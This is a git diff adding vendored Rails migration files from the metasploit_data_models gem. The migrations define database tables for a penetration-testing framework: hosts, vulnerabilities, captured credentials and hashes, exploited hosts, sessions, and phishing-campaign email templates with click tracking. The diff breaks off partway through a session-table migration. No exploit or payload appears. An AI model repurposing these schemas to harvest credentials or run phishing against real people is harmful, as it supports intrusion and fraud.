+ change_table :hosts do |t|
+ t.string :info, :limit => 65536
+ end
+
+ remove_column :services, :info
+ change_table :services do |t|
+ t.string :info, :limit => 65536
+ end
+ end
+
+ def self.down
+
+ remove_column :events, :info
+ change_table :events do |t|
+ t.string :info
+ end
+
+ remove_column :notes, :data
+ change_table :notes do |t|
+ t.string :data, :limit => 4096
+ end
+
+ remove_column :hosts, :info
+ change_table :hosts do |t|
+ t.string :info, :limit => 4096
+ end
+
+ remove_column :vulns, :data
+ change_table :vulns do |t|
+ t.string :data, :limit => 4096
+ end
+
+ remove_column :services, :info
+ change_table :services do |t|
+ t.string :info, :limit => 4096
+ end
+
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/018_add_workspace_user_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/018_add_workspace_user_info.rb
new file mode 100755
index 0000000000..fb5e101fc3
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/018_add_workspace_user_info.rb
@@ -0,0 +1,29 @@
+class AddWorkspaceUserInfo < ActiveRecord::Migration
+ def self.up
+ change_table :workspaces do |t|
+ t.string :boundary, :limit => 4096
+ end
+
+ change_table :users do |t|
+ t.string :fullname
+ t.string :email
+ t.string :phone
+ t.string :company
+ end
+ end
+
+ def self.down
+ change_table :workspaces do |t|
+ t.remove :boundary
+ end
+
+ change_table :users do |t|
+ t.remove :fullname
+ t.remove :email
+ t.remove :phone
+ t.remove :company
+ end
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/019_add_workspace_desc.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/019_add_workspace_desc.rb
new file mode 100755
index 0000000000..0dc31f0c61
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/019_add_workspace_desc.rb
@@ -0,0 +1,23 @@
+class AddWorkspaceDesc < ActiveRecord::Migration
+ def self.up
+ change_table :workspaces do |t|
+ t.string :description, :limit => 4096
+ end
+
+ change_table :hosts do |t|
+ t.string :comments, :limit => 4096
+ end
+ end
+
+ def self.down
+ change_table :workspaces do |t|
+ t.remove :description
+ end
+
+ change_table :hosts do |t|
+ t.remove :comments
+ end
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/020_add_user_preferences.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/020_add_user_preferences.rb
new file mode 100755
index 0000000000..40b472701c
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/020_add_user_preferences.rb
@@ -0,0 +1,11 @@
+class AddUserPreferences < ActiveRecord::Migration
+ def self.up
+ add_column :users, :prefs, :string, :limit => 524288
+ end
+
+ def self.down
+ remove_column :users, :prefs
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/021_standardize_info_and_data.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/021_standardize_info_and_data.rb
new file mode 100755
index 0000000000..bb9a2bccd6
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/021_standardize_info_and_data.rb
@@ -0,0 +1,18 @@
+class StandardizeInfoAndData < ActiveRecord::Migration
+ def self.up
+ # Remove the host requirement. We'll add the column back in below.
+ remove_column :vulns, :data
+ change_table :vulns do |t|
+ t.string :info, :limit => 65536
+ end
+ end
+
+ def self.down
+ remove_column :vulns, :info
+ change_table :notes do |t|
+ t.string :data, :limit => 65536
+
+ end
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/022_enlarge_event_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/022_enlarge_event_info.rb
new file mode 100755
index 0000000000..fec9698c06
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/022_enlarge_event_info.rb
@@ -0,0 +1,10 @@
+class EnlargeEventInfo < ActiveRecord::Migration
+ def self.up
+ change_column :events, :info, :text
+ end
+
+ def self.down
+ change_column :events, :info, :string, :limit => 65535
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/023_add_report_downloaded_at.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/023_add_report_downloaded_at.rb
new file mode 100755
index 0000000000..7ec5716e82
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/023_add_report_downloaded_at.rb
@@ -0,0 +1,10 @@
+class AddReportDownloadedAt < ActiveRecord::Migration
+ def self.up
+ add_column :reports, :downloaded_at, :timestamp
+ end
+
+ def self.down
+ remove_column :reports, :downloaded_at
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/024_convert_service_info_to_text.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/024_convert_service_info_to_text.rb
new file mode 100755
index 0000000000..14f0a96222
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/024_convert_service_info_to_text.rb
@@ -0,0 +1,12 @@
+class ConvertServiceInfoToText < ActiveRecord::Migration
+
+ def self.up
+ change_column :services, :info, :text
+ end
+
+ def self.down
+ change_column :services, :info, :string, :limit => 65536
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/025_add_user_admin.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/025_add_user_admin.rb
new file mode 100755
index 0000000000..d077dbd633
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/025_add_user_admin.rb
@@ -0,0 +1,19 @@
+class AddUserAdmin < ActiveRecord::Migration
+
+ # Add user admin flag and project member list.
+ def self.up
+ add_column :users, :admin, :boolean, :default => true
+
+ create_table :project_members, :id => false do |t|
+ t.integer :workspace_id, :null => false
+ t.integer :user_id, :null => false
+ end
+ end
+
+ def self.down
+ remove_column :users, :admin
+
+ drop_table :project_members
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/026_add_creds_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/026_add_creds_table.rb
new file mode 100755
index 0000000000..381ec8373a
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/026_add_creds_table.rb
@@ -0,0 +1,19 @@
+class AddCredsTable < ActiveRecord::Migration
+ def self.up
+ create_table :creds do |t|
+ t.integer :service_id, :null => false
+ t.timestamps
+ t.string :user, :limit => 2048
+ t.string :pass, :limit => 4096
+ t.boolean :active, :default => true
+ t.string :proof, :limit => 4096
+ t.string :ptype, :limit => 16
+ t.integer :source_id
+ t.string :source_type
+ end
+ end
+ def self.down
+ drop_table :creds
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100819123300_migrate_cred_data.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100819123300_migrate_cred_data.rb
new file mode 100755
index 0000000000..d752c270f4
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100819123300_migrate_cred_data.rb
@@ -0,0 +1,154 @@
+class MigrateCredData < ActiveRecord::Migration
+
+ def self.up
+ begin # Wrap the whole thing in a giant rescue.
+ skipped_notes = []
+ new_creds = []
+ Mdm::Note.find(:all).each do |note|
+ next unless note.ntype[/^auth\.(.*)/]
+ service_name = $1
+ if !service_name
+ skipped_notes << note
+ next
+ end
+ if note.host and note.host.respond_to?(:address)
+ if note.service
+ svc_id = note.service.id
+ else
+ candidate_services = []
+ note.host.services.each do |service|
+ if service.name == service_name
+ candidate_services << service
+ end
+ end
+ # Use the default port, or the first port that matches the protocol name.
+ default_port = case service_name.downcase
+ when 'ftp'; 21
+ when /^smb/; 445
+ when /^imap/; 143
+ when 'telnet'; 23
+ when 'pop3'; 110
+ when 'http','domino','axis','wordpress','tomcat'; 80
+ when 'tns'; 1521
+ when 'snmp'; 161
+ when 'mssql'; 1433
+ when 'ssh'; 22
+ when 'https'; 443
+ when 'mysql'; 3306
+ when 'db2'; 50000
+ when 'postgres'; 5432
+ else nil
+ end
+ if !default_port
+ skipped_notes << note
+ next
+ end
+ if candidate_services.size == 1
+ svc_id = candidate_services.first.id
+ elsif candidate_services.empty?
+ Mdm::Service.new do |svc|
+ svc.host_id = note.host.id
+ svc.port = default_port
+ svc.proto = 'tcp'
+ svc.state = 'open'
+ svc.name = service_name.downcase
+ svc.save!
+ svc_id = svc.id
+ end
+ elsif candidate_services.size > 1
+ svc_ports = candidate_services.map{|s| s.port}
+ if svc_ports.index(default_port)
+ svc_id = candidate_services[svc_ports.index(default_port)].id
+ else
+ svc_id = candidate_services.first.id
+ end
+ end
+ end
+ else
+ skipped_notes << note
+ next
+ end
+ if note.data[:hash]
+ ptype = 'smb_hash'
+ pass = note.data[:hash]
+ elsif note.data[:ssh_key]
+ ptype = 'ssh_key'
+ pass = note.data[:extra]
+ else
+ ptype = 'password'
+ pass = note.data[:pass]
+ end
+ # Format domains and databases into the usernames.
+ if note.ntype == "auth.smb_challenge"
+ domain = note.data[:extra].match(/DOMAIN=([^\s]+)/)[1]
+ if domain
+ user = [domain, note.data[:user]].join("/")
+ else
+ user = note.data[:user]
+ end
+ elsif note.ntype =~ /auth\.(postgres|db2)/
+ if note.data[:database]
+ user = [note.data[:database], note.data[:user]].join("/")
+ else
+ user = note.data[:user]
+ end
+ else
+ user = note.data[:user]
+ end
+ # Not actually a credentials, convert to migrated notes
+ if service_name == 'smb' && note.data[:token]
+ skipped_notes << note
+ next
+ end
+ if service_name == 'tns' && note.data[:type] == "bruteforced_sid"
+ skipped_notes << note
+ next
+ end
+ # Special case for the bizarre reporting for aux/admin/oracle/oracle_login
+ if service_name == 'tns' && note.data[:type] == "bruteforced_account"
+ note.data[:data] =~ /([^\x2f]+)\x2f([^\s]+).*with sid (.*)/
+ user = "#{$3}/#{$1}"
+ pass = $2
+ end
+ new_creds << [svc_id, ptype, user, pass]
+ end
+
+ say "Migrating #{new_creds.size} credentials."
+ new_creds.uniq.each do |note|
+ Mdm::Cred.new do |cred|
+ cred.service_id = note[0]
+ cred.user = note[2]
+ cred.pass = note[3]
+ cred.ptype = note[1]
+ cred.save!
+ end
+ end
+
+ say "Migrating #{skipped_notes.size} notes."
+ skipped_notes.uniq.each do |note|
+ Mdm::Note.new do |new_note|
+ new_note.host_id = note.host_id
+ new_note.ntype = "migrated_auth"
+ new_note.data = note.data.merge(:migrated_auth_type => note.ntype)
+ new_note.save!
+ end
+ end
+
+ say "Deleting migrated auth notes."
+ Mdm::Note.find(:all).each do |note|
+ next unless note.ntype[/^auth\.(.*)/]
+ note.delete
+ end
+ rescue
+ say "There was a problem migrating auth credentials. Skipping."
+ return true # Never fail!
+ end
+ end
+
+
+ def self.down
+ raise ActiveRecord::IrreversibleMigration
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100824151500_add_exploited_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100824151500_add_exploited_table.rb
new file mode 100755
index 0000000000..b7897d3832
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100824151500_add_exploited_table.rb
@@ -0,0 +1,16 @@
+class AddExploitedTable < ActiveRecord::Migration
+ def self.up
+ create_table :exploited_hosts do |t|
+ t.integer :host_id, :null => false
+ t.integer :service_id
+ t.string :session_uuid, :limit => 8
+ t.string :name, :limit => 2048
+ t.string :payload, :limit => 2048
+ t.timestamps
+ end
+ end
+ def self.down
+ drop_table :exploited_hosts
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100908001428_add_owner_to_workspaces.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100908001428_add_owner_to_workspaces.rb
new file mode 100755
index 0000000000..c136d4b9d7
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100908001428_add_owner_to_workspaces.rb
@@ -0,0 +1,9 @@
+class AddOwnerToWorkspaces < ActiveRecord::Migration
+ def self.up
+ add_column :workspaces, :owner_id, :integer
+ end
+
+ def self.down
+ remove_column :workspaces, :owner_id
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100911122000_add_report_templates.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100911122000_add_report_templates.rb
new file mode 100755
index 0000000000..08b06d4c5f
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100911122000_add_report_templates.rb
@@ -0,0 +1,18 @@
+class AddReportTemplates < ActiveRecord::Migration
+
+ def self.up
+ create_table :report_templates do |t|
+ t.integer :workspace_id, :null => false, :default => 1
+ t.string :created_by
+ t.string :path, :limit => 1024
+ t.text :name
+ t.timestamps
+ end
+ end
+
+ def self.down
+ drop_table :reports
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916151530_require_admin_flag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916151530_require_admin_flag.rb
new file mode 100755
index 0000000000..d73e18425d
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916151530_require_admin_flag.rb
@@ -0,0 +1,15 @@
+class RequireAdminFlag < ActiveRecord::Migration
+
+ # Make the admin flag required.
+ def self.up
+ # update any existing records
+ Mdm::User.update_all({:admin => true}, {:admin => nil})
+
+ change_column :users, :admin, :boolean, :null => false, :default => true
+ end
+
+ def self.down
+ change_column :users, :admin, :boolean, :default => true
+ end
+
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916175000_add_campaigns_and_templates.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916175000_add_campaigns_and_templates.rb
new file mode 100755
index 0000000000..433bdcf65f
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916175000_add_campaigns_and_templates.rb
@@ -0,0 +1,61 @@
+
+class AddCampaignsAndTemplates < ActiveRecord::Migration
+
+ def self.up
+ create_table :campaigns do |t|
+ t.integer :workspace_id, :null => false
+ t.string :name, :limit => 512
+ # Serialized, stores SMTP/other protocol config options etc.
+ t.text :prefs
+ t.integer :status, :default => 0
+ t.timestamp :started_at
+ t.timestamps
+ end
+
+ create_table :email_templates do |t|
+ t.string :name, :limit => 512
+ t.string :subject, :limit => 1024
+ t.text :body
+ t.integer :parent_id
+ t.integer :campaign_id
+ end
+ create_table :attachments do |t|
+ t.string :name, :limit => 512
+ t.binary :data
+ t.string :content_type, :limit => 512
+ t.boolean :inline, :null => false, :default => true
+ t.boolean :zip, :null => false, :default => false
+ end
+ create_table :attachments_email_templates, :id => false do |t|
+ t.integer :attachment_id
+ t.integer :email_template_id
+ end
+
+ create_table :email_addresses do |t|
+ t.integer :campaign_id, :null => false
+ t.string :first_name, :limit => 512
+ t.string :last_name, :limit => 512
+ t.string :address, :limit => 512
+ t.boolean :sent, :null => false, :default => false
+ t.timestamp :clicked_at
+ end
+
+ create_table :web_templates do |t|
+ t.string :name, :limit => 512
+ t.string :title, :limit => 512
+ t.string :body, :limit => 524288
+ t.integer :campaign_id
+ end
+ end
+
+ def self.down
+ drop_table :campaigns
+ drop_table :email_templates
+ drop_table :attachments
+ drop_table :attachments_email_templates
+ drop_table :email_addresses
+ drop_table :web_templates
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100920012100_add_generate_exe_column.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100920012100_add_generate_exe_column.rb
new file mode 100755
index 0000000000..7b055b268f
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100920012100_add_generate_exe_column.rb
@@ -0,0 +1,8 @@
+class AddGenerateExeColumn < ActiveRecord::Migration
+ def self.up
+ add_column :email_templates, :generate_exe, :boolean, :null => false, :default => false
+ end
+ def self.down
+ remove_column :email_templates, :generate_exe
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100926214000_add_template_prefs.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100926214000_add_template_prefs.rb
new file mode 100755
index 0000000000..70b84d0734
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100926214000_add_template_prefs.rb
@@ -0,0 +1,11 @@
+class AddTemplatePrefs < ActiveRecord::Migration
+ def self.up
+ remove_column :email_templates, :generate_exe
+ add_column :email_templates, :prefs, :text
+ add_column :web_templates, :prefs, :text
+ end
+ def self.down
+ remove_column :email_templates, :prefs
+ remove_column :web_templates, :prefs
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101001000000_add_web_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101001000000_add_web_tables.rb
new file mode 100755
index 0000000000..e55bf286b5
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101001000000_add_web_tables.rb
@@ -0,0 +1,57 @@
+class AddWebTables < ActiveRecord::Migration
+
+ def self.up
+ create_table :web_sites do |t|
+ t.integer :service_id, :null => false
+ t.timestamps
+ t.string :vhost, :limit => 2048
+ t.text :comments
+ t.text :options
+ end
+
+ create_table :web_pages do |t|
+ t.integer :web_site_id, :null => false
+ t.timestamps
+ t.text :path
+ t.text :query
+ t.integer :code, :null => false
+ t.text :cookie
+ t.text :auth
+ t.text :ctype
+ t.timestamp :mtime
+ t.text :location
+ t.text :body
+ t.text :headers
+ end
+
+ create_table :web_forms do |t|
+ t.integer :web_site_id, :null => false
+ t.timestamps
+ t.text :path
+ t.string :method, :limit => 1024
+ t.text :params
+ end
+
+ create_table :web_vulns do |t|
+ t.integer :web_site_id, :null => false
+ t.timestamps
+ t.text :path
+ t.string :method, :limit => 1024
+ t.text :params
+ t.text :pname
+ t.text :proof
+ t.integer :risk
+ t.string :name, :limit => 1024
+ end
+
+ end
+
+ def self.down
+ drop_table :web_sites
+ drop_table :web_pages
+ drop_table :web_forms
+ drop_table :web_vulns
+ end
+end
+
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101002000000_add_query.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101002000000_add_query.rb
new file mode 100755
index 0000000000..f22d0f2954
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101002000000_add_query.rb
@@ -0,0 +1,10 @@
+class AddQuery < ActiveRecord::Migration
+ def self.up
+ add_column :web_forms, :query, :text
+ add_column :web_vulns, :query, :text
+ end
+ def self.down
+ remove_column :web_forms, :query
+ remove_column :web_vulns, :query
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101007000000_add_vuln_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101007000000_add_vuln_info.rb
new file mode 100755
index 0000000000..34c1eb3fd9
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101007000000_add_vuln_info.rb
@@ -0,0 +1,15 @@
+class AddVulnInfo < ActiveRecord::Migration
+ def self.up
+ add_column :web_vulns, :category, :text
+ add_column :web_vulns, :confidence, :text
+ add_column :web_vulns, :description, :text
+ add_column :web_vulns, :blame, :text
+ end
+ def self.down
+ remove_column :web_forms, :category
+ remove_column :web_vulns, :confidence
+ remove_column :web_vulns, :description
+ remove_column :web_vulns, :blame
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101008111800_add_clients_to_campaigns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101008111800_add_clients_to_campaigns.rb
new file mode 100755
index 0000000000..6281f91343
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101008111800_add_clients_to_campaigns.rb
@@ -0,0 +1,10 @@
+
+class AddClientsToCampaigns < ActiveRecord::Migration
+ def self.up
+ add_column :clients, :campaign_id, :integer
+ end
+
+ def self.down
+ remove_column :clients, :campaign_id
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101009023300_add_campaign_attachments.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101009023300_add_campaign_attachments.rb
new file mode 100755
index 0000000000..6baf770f29
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101009023300_add_campaign_attachments.rb
@@ -0,0 +1,15 @@
+
+
+class AddCampaignAttachments < ActiveRecord::Migration
+
+ def self.up
+ add_column :attachments, :campaign_id, :integer
+ end
+
+ def self.down
+ remove_column :attachments, :campaign_id
+ end
+
+end
+
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101104135100_add_imported_creds.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101104135100_add_imported_creds.rb
new file mode 100755
index 0000000000..92eb12d474
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101104135100_add_imported_creds.rb
@@ -0,0 +1,17 @@
+class AddImportedCreds < ActiveRecord::Migration
+
+ def self.up
+ create_table :imported_creds do |t|
+ t.integer :workspace_id, :null => false, :default => 1
+ t.string :user, :limit => 512
+ t.string :pass, :limit => 512
+ t.string :ptype, :limit => 16, :default => "password"
+ end
+ end
+
+ def self.down
+ drop_table :imported_creds
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000000_fix_web_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000000_fix_web_tables.rb
new file mode 100755
index 0000000000..2056369ed7
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000000_fix_web_tables.rb
@@ -0,0 +1,34 @@
+class FixWebTables < ActiveRecord::Migration
+
+ def self.up
+ change_column :web_pages, :path, :text
+ change_column :web_pages, :query, :text
+ change_column :web_pages, :cookie, :text
+ change_column :web_pages, :auth, :text
+ change_column :web_pages, :ctype, :text
+ change_column :web_pages, :location, :text
+ change_column :web_pages, :path, :text
+ change_column :web_vulns, :path, :text
+ change_column :web_vulns, :pname, :text
+
+ add_column :web_pages, :request, :text
+ add_column :web_vulns, :request, :text
+ end
+
+ def self.down
+ change_column :web_pages, :path, :text
+ change_column :web_pages, :query, :text
+ change_column :web_pages, :cookie, :text
+ change_column :web_pages, :auth, :text
+ change_column :web_pages, :ctype, :text
+ change_column :web_pages, :location, :text
+ change_column :web_pages, :path, :text
+ change_column :web_vulns, :path, :text
+ change_column :web_vulns, :pname, :text
+
+ remove_column :web_pages, :request
+ remove_column :web_vulns, :request
+ end
+end
+
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000001_expand_host_comment.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000001_expand_host_comment.rb
new file mode 100755
index 0000000000..1a0bc1bc51
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000001_expand_host_comment.rb
@@ -0,0 +1,12 @@
+class ExpandHostComment < ActiveRecord::Migration
+
+ def self.up
+ change_column :hosts, :comments, :text
+ end
+
+ def self.down
+ change_column :hosts, :comments, :string, :limit => 4096
+ end
+end
+
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb
new file mode 100755
index 0000000000..7365e14f9d
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb
@@ -0,0 +1,9 @@
+class AddLimitToNetworkToWorkspaces < ActiveRecord::Migration
+ def self.up
+ add_column :workspaces, :limit_to_network, :boolean, :null => false, :default => false
+ end
+
+ def self.down
+ remove_column :workspaces, :limit_to_network
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110112154300_add_module_uuid_to_tasks.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110112154300_add_module_uuid_to_tasks.rb
new file mode 100755
index 0000000000..f41bc6a813
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110112154300_add_module_uuid_to_tasks.rb
@@ -0,0 +1,9 @@
+class AddModuleUuidToTasks < ActiveRecord::Migration
+ def self.up
+ add_column :tasks, :module_uuid, :string, :limit => 8
+ end
+
+ def self.down
+ remove_column :tasks, :module_uuid
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110204112800_add_host_tags.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110204112800_add_host_tags.rb
new file mode 100755
index 0000000000..d07c885c35
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110204112800_add_host_tags.rb
@@ -0,0 +1,28 @@
+class AddHostTags < ActiveRecord::Migration
+
+ def self.up
+
+ create_table :tags do |t|
+ t.integer :user_id
+ t.string :name, :limit => 1024
+ t.text :desc
+ t.boolean :report_summary, :null => false, :default => false
+ t.boolean :report_detail, :null => false, :default => false
+ t.boolean :critical, :null => false, :default => false
+ t.timestamps
+ end
+
+ create_table :hosts_tags, :id => false do |t|
+ t.integer :host_id
+ t.integer :tag_id
+ end
+
+ end
+
+ def self.down
+ drop_table :hosts_tags
+ drop_table :tags
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110317144932_add_session_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110317144932_add_session_table.rb
new file mode 100755
index 0000000000..15ac8852bb
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110317144932_add_session_table.rb
@@ -0,0 +1,110 @@
+class AddSessionTable < ActiveRecord::Migration
+
+ class Event < ActiveRecord::Base
+ serialize :info
+ end
+
+ class SessionEvent < ActiveRecord::Base
+ belongs_to :session
+ end
+
+ class Session < ActiveRecord::Base
+ has_many :events, :class_name => 'AddSessionTable::SessionEvent'
+ serialize :datastore
+ end
+
+ def self.up
+
+ create_table :sessions do |t|
+ t.integer :host_id
+
+ t.string :stype # session type: meterpreter, shell, etc
+ t.string :via_exploit # module name
+ t.string :via_payload # payload name
+ t.string :desc # session description
+ t.integer :port
+ t.string :platform # platform type of the remote system
+ t.string :routes
+
+ t.text :datastore # module's datastore
+
+ t.timestamp :opened_at, :null => false
+ t.timestamp :closed_at
+
+ t.string :close_reason
+ end
+
+ create_table :session_events do |t|
+ t.integer :session_id
+
+ t.string :etype # event type: command, output, upload, download, filedelete
+ t.binary :command
+ t.binary :output
+ t.string :remote_path
+ t.string :local_path
+
+ t.timestamp :created_at
+ end
+
+ #
+ # Migrate session data from events table
+ #
+
+ close_events = Event.find_all_by_name("session_close")
+ open_events = Event.find_all_by_name("session_open")
+
+ command_events = Event.find_all_by_name("session_command")
+ output_events = Event.find_all_by_name("session_output")
+ upload_events = Event.find_all_by_name("session_upload")
+ download_events = Event.find_all_by_name("session_download")
+
+ open_events.each do |o|
+ c = close_events.find { |e| e.info[:session_uuid] == o.info[:session_uuid] }
+
+ s = Session.new(
+ :host_id => o.host_id,
+ :stype => o.info[:session_type],
+ :via_exploit => o.info[:via_exploit],
+ :via_payload => o.info[:via_payload],
+ :datastore => o.info[:datastore],
+ :opened_at => o.created_at
+ )
+
+ if c
+ s.closed_at = c.created_at
+ s.desc = c.info[:session_info]
+ else
